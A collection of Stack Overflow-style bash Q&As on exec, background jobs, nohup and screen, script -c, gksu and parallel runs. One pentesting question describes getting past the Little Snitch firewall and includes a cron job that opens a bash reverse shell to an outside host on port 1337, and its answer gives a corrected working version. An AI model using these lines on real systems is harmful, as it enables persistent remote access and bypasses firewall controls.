Running exec on wget commands in a file from bash script ignores wget options - bash

If I run this shell script, exec causes wget to act goofy.
echo "wget http://www.google.com/ -O - >> output.html" > /tmp/mytext
while read line
do
exec $line
done < /tmp/mytext
It acts as if wget is operating on three different URLs:
wget http://www.google.com/ -O -
wget >>
wget output.html
The first command spits the output to STDOUT and the next two wget commands fail as they are nonsense.
How do I get exec to work properly?
I'm using exec instead of simply calling bash on the file because if I use exec on a large list of wget calls I get more than one wget process spawned. Simply calling bash on a file with a large list of urls is slow as it waits for one wget operation to complete before moving onto the next one.
Versions:
GNU Wget 1.15 built on linux-gnu.
GNU bash, version 4.3.0(1)-release (i686-pc-linux-gnu)

I'm using exec instead of simply calling bash on the file because if I
use exec on a large list of wget calls I get more than one wget
process spawned.
No. When exec is called, it does not spawn a new process. It replaces the existing process. See man bash for details.
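A quick way to see the replacement behaviour for yourself (a throwaway demo, not part of the fix):
bash -c 'echo "shell pid: $$"; exec ps -o pid=,comm= -p $$'
The ps output shows the same pid, now running ps: the shell was replaced rather than forked.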
Simply calling bash on a file with a large list of urls is slow as it
waits for one wget operation to complete before moving onto the next
one.
True. Fortunately, there is a solution. To run a lot of processes in parallel, run them in the background. For example, to run many wget processes in parallel, use:
while read url
do
wget "$url" -O - >> output.html &
done <list_of_urls
The ampersand at the end of the line causes that command to run in the background, in parallel with everything else. The above code will start new wget processes as fast as it can. Those processes will continue until they complete.
You can experiment with this idea very simply at the command prompt. Run
sleep 10s
and your command prompt will disappear for 10 seconds. However, run:
sleep 10s &
and your command prompt will return immediately while sleep runs in the background.
man bash explains:
If a command is terminated by the control operator &,
the shell executes the command in the background in a
subshell. The shell does not wait for the command to
finish, and the return status is 0.
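If the list of URLs is very long, you may also want to cap how many downloads run at once. A minimal sketch, assuming an arbitrary limit of 10 parallel jobs and bash 4.3 or newer for wait -n (the bash 4.3.0 in the question qualifies):
while read url
do
wget "$url" -O - >> output.html &
if [ "$(jobs -rp | wc -l)" -ge 10 ]; then
wait -n    # bash 4.3+: wait for any one background job to finish
fi
done <list_of_urls
wait    # wait for the remaining downloads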

I think you can use
exec $(cat /tmp/mytext)

Related

Bash script to run a detached loop that sequentially starts backgound processes

I am trying to run a series of tests on a remote Linux server to which I am connecting via ssh.
I don't want to have to stay logged in the ssh session during the runs -> nohup(?)
I don't want to have to keep checking if one run is done -> for loop(?)
Because of licensing issues, I can only run a single testing process at a time -> sequential
I want to keep working while the test set is being processed -> background
Here's what I tried:
#!/usr/bin/env bash
# Assembling a list of commands to be executed sequentially
TESTRUNS="";
for i in `ls ../testSet/*`;
do
MSG="running test problem ${i##*/}";
RUN="mySequentialCommand $i > results/${i##*/} 2> /dev/null;";
TESTRUNS=$TESTRUNS"echo $MSG; $RUN";
done
#run commands with nohup to be able to log out of ssh session
nohup eval $TESTRUNS &
But it looks like nohup doesn't fare too well with eval.
Any thoughts?
nohup is needed if you want your scripts to run even after the shell is closed. So yes.
And the & is not necessary inside RUN, since you already execute the whole command with & at the end.
Now your script builds the command in the for loop, but doesn't execute it. It means you'll have only the last file running. If you want to run all of the files, you need to execute the nohup command as part of your loop. BUT - you can't run the commands with & because this will run commands in the background and return to the script, which will execute the next item in the loop. Eventually this would run all files in parallel.
Move the nohup eval $TESTRUNS inside the for loop, but again, you can't run it with &. What you need to do is run the script itself with nohup, and the script will loop through all files one at a time, in the background, even after the shell is closed.
You could take a look at screen, an alternative to nohup with additional features. I will replace your test script with while [ 1 ]; do printf "."; sleep 5; done for testing the screen solution.
The screen -ls commands are optional, just showing what is going on.
prompt> screen -ls
No Sockets found in /var/run/uscreens/S-notroot.
prompt> screen
prompt> screen -ls
prompt> while [ 1 ]; do printf "."; sleep 5; done
# You don't get a prompt. Use "CTRL-a d" to detach from your current screen
prompt> screen -ls
# do some work
# connect to screen with batch running
prompt> screen -r
# Press ^C to terminate the batch (script printing dots)
prompt> screen -ls
prompt> exit
prompt> screen -ls
Google for screenrc to see how you can customize the interface.
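You can also start a script in a detached screen session in one go (run_tests.sh is a hypothetical name for the script below):
screen -dmS tests ./run_tests.sh   # -d -m: start detached; -S tests: name the session
screen -r tests                    # reattach later to check on it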
You can change your script into something like
#!/usr/bin/env bash
# Assembling a list of commands to be executed sequentially
for i in ../testSet/*; do
echo "Running test problem ${i##*/}"
mySequentialCommand $i > results/${i##*/} 2> /dev/null
done
The above script can be started with nohup scriptname & when you do not use screen, or simply as scriptname inside a screen session.
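For example, assuming the loop above is saved as run_tests.sh (a hypothetical name) and you want to keep its output:
nohup ./run_tests.sh > run_tests.log 2>&1 &
The shell returns immediately, the tests keep running one at a time after you log out, and everything the script prints ends up in run_tests.log.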

How to run "script -a xxx.txt" properly in a shell script?

I have a shell script and I want the session text to be saved automatically every time the script runs, so I included the command "script -a output.txt" at the beginning of my script. However, the script stops running after this line of code, which only displays a "bash-3.2$" on the screen and won't go on. Any ideas?
Thanks in advance!
The problem is that script starts a sub-shell separate from the one that is running the actual script. To club them together, use the -c flag of script:
-c, --command command
Run the command rather than an interactive shell. This makes
it easy for a script to capture the output of a program that
behaves differently when its stdout is not a tty.
Just do,
script -c 'bash yourScript.sh' -a output.txt
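A quick way to check the behaviour, assuming the util-linux script whose man page is quoted above and a trivial throwaway script:
printf 'echo hello from the script\n' > yourScript.sh
script -c 'bash yourScript.sh' -a output.txt
cat output.txt    # the appended session text includes "hello from the script"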

OS X: cron job invokes bash but process run is 'sh'

I'm working on a pentesting project in which I want to open a reverse shell. I have a device that can trigger Little Snitch and then set it to allow outbound connections for certain processes. It does this by issuing a reverse shell command and, when the LS window pops up, acts as a keyboard to tell LS to always allow this type of connection. I can successfully do this for Bash, Perl, Python and Curl. The device also installs a cron job which contains a one-line reverse shell using bash.
But here's the problem...
The first time the cron job runs, Little Snitch still gets triggered because it has seen an outbound connection from 'sh' - not 'bash'. Yet the command definitely calls bash. The cron job is:
*/5 * * * * /bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &
Subsequent connections are either from bash or sh - I haven't yet detected a pattern.
I've tried triggering LS in the original setup by using /bin/sh, but at that stage it still gets interpreted (ie, is seen by LS) as bash, not sh (as, in OS X, they are essentially the same thing but with slightly different behaviours depending on how they are invoked).
Any thoughts about how I can stop OS X from using sh rather than bash in the cron job? Or, alternatively, how I can invoke sh rather than bash? (Like I said, /bin/sh doesn't do it!)
The command string is /bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &. Cron needs to invoke this command. It doesn't parse the command string itself to learn that the first "word" is /bin/bash and then execute /bin/bash, passing it the rest of the arguments. (Among other things, not all parts of the command are arguments.)
Instead, it invokes /bin/sh with a first argument of -c and the second argument being your command string. That's just the generic way to run a command string.
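In other words, for the crontab line above, cron effectively executes something like:
/bin/sh -c '/bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &'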
Then, /bin/sh interprets the command string. Part of the command is redirection. This is not done by the program that the command launches. It is done by the shell which will launch that program. That is, the instance of /bin/sh has to set up the file descriptors for the child process it's going to launch prior to launching that child process.
So, /bin/sh opens /dev/tcp/connect.blogsite.org/1337. It then passes the file descriptor to the child process it launches as descriptors 0 and 1. (It could do this using fork() and dup2() before execve() or it could do it all using posix_spawn() with appropriate file actions.)
The ultimate /bin/bash process doesn't open its own input or output. It just inherits them and, presumably, goes on to use them.
You could fix this by using yet another level of indirection in your command string. Basically, invoke /bin/bash with -c and its own command string. Like so:
*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &'
So, the initial instance of /bin/sh won't open the file. It will simply spawn an instance of /bin/bash with arguments -c and the command string. That first instance of /bin/bash will interpret the command string, open the file in order to carry out the redirection directives, and then spawn a second instance of /bin/bash which will inherit those file descriptors.
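If you want to convince yourself which shell is doing the wrapping, here is a quick throwaway check to run from a normal terminal (not part of the crontab entry):
/bin/sh -c 'echo "wrapper shell: $0"'     # prints /bin/sh
/bin/bash -c 'echo "wrapper shell: $0"'   # prints /bin/bash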

Execute one command after another one finishes under gksu

I'm trying to have a desktop shortcut that executes one command (without a script; I'm just wondering if that is possible). That command requires root privileges, so I use gksu in Ubuntu. After I finish typing my password and it is correct, I want the other command to run a file. I have this command:
xterm -e "gksu cp /opt/Popcorn-Time/backup/* /opt/Popcorn-Time; /opt/Popcorn-Time/Popcorn-Time"
But Popcorn-Time opens without waiting for me to finish typing my password (correctly). I want to do this without a separate script, if possible.
How should I do this?
EDIT: Ah! I see what is going on now. You've all been helping me make Popcorn-Time wait for gksu to finish, but Popcorn-Time isn't going to run without the files in backup, and those are a bit heavy (7 MB total), so it takes a second for them to complete the transfer; Popcorn-Time is already open by the time the files are copied. Is there a way to make Popcorn-Time wait for the cp command to finish?
I also changed my command above to what I have now.
EDIT #2: Everything I said up to now isn't relevant, as the problem with Popcorn-Time isn't what I thought. I didn't need to copy the files over, I just needed to run it as root for it to work. Thanks to everyone who tried to help.
Thanks.
If you want the /opt/popcorntime/Popcorn-Time command to wait until the first command finishes, you can separate the commands with && so that the second only executes on successful completion of the first. In bash terms this is an AND list. E.g.:
command1 && command2
With gksu in order to run multiple commands with only a single password entry, you will need:
gksu -- bash -c 'command1 && command2'
In your case:
gnome-terminal -e gksu -- bash -c "cp /opt/popcorntime/backup/* /opt/popcorntime && /opt/popcorntime/Popcorn-Time"
(you may have to adjust quoting to fit your expansion needs)
You can use the or operator in a similar fashion so that the second command only executes if the first fails. E.g.:
command1 || command2
In a console you would do:
gksu cp /opt/popcorntime/backup/* /opt/popcorntime; /opt/popcorntime/Popcorn-Time
In order to use it as Exec in the .desktop file wrap it like this:
bash -e "gksu cp /opt/popcorntime/backup/* /opt/popcorntime; /opt/popcorntime/Popcorn-Time"
The problem is that gnome-terminal is only seeing the gksu command as the value to the -e argument and not the Popcorn-Time command.
gnome-terminal forks and returns immediately and so Popcorn-Time runs immediately.
The solution is to quote the entire command string (both commands) so they are (combined) the single argument to -e.
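For example (a sketch; adjust the paths and quoting to your setup):
gnome-terminal -e 'bash -c "gksu cp /opt/popcorntime/backup/* /opt/popcorntime; /opt/popcorntime/Popcorn-Time"'
The outer single quotes keep the whole bash -c command string together, so gnome-terminal receives both commands as a single -e argument.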

Running processes simultaneously, Bash

I would like to run n processes (in my case simulations) simultaneously, using bash.
Right now this is what I'm running:
for file in $ini/SAN*.ini;
do
echo "Running $file...";
temp=$(basename $file .ini)
mosrun -G opp_run -r 0 -u Cmdenv -n ..:../../src -l ../../src/inet SAN.ini > $outputs/$temp.out;
done
Problem is, the loop only progresses to the next iteration after the simulation is done. Any suggestions? Thanks!
You should be able to run your command in the background by adding an & after it.
That should make them run in parallel, although in the background.
(Small side note: the processes will continue to run even if you abort the script, so you might want to add a trap to kill them if you hit e.g. Ctrl-C while the script is running. Look at the bash manual.)
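A minimal sketch of the same loop with the jobs backgrounded (variable names and the mosrun invocation taken from the question):
for file in $ini/SAN*.ini;
do
echo "Running $file...";
temp=$(basename $file .ini)
mosrun -G opp_run -r 0 -u Cmdenv -n ..:../../src -l ../../src/inet SAN.ini > $outputs/$temp.out &
done
wait    # optional: block here until every backgrounded simulation has finished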
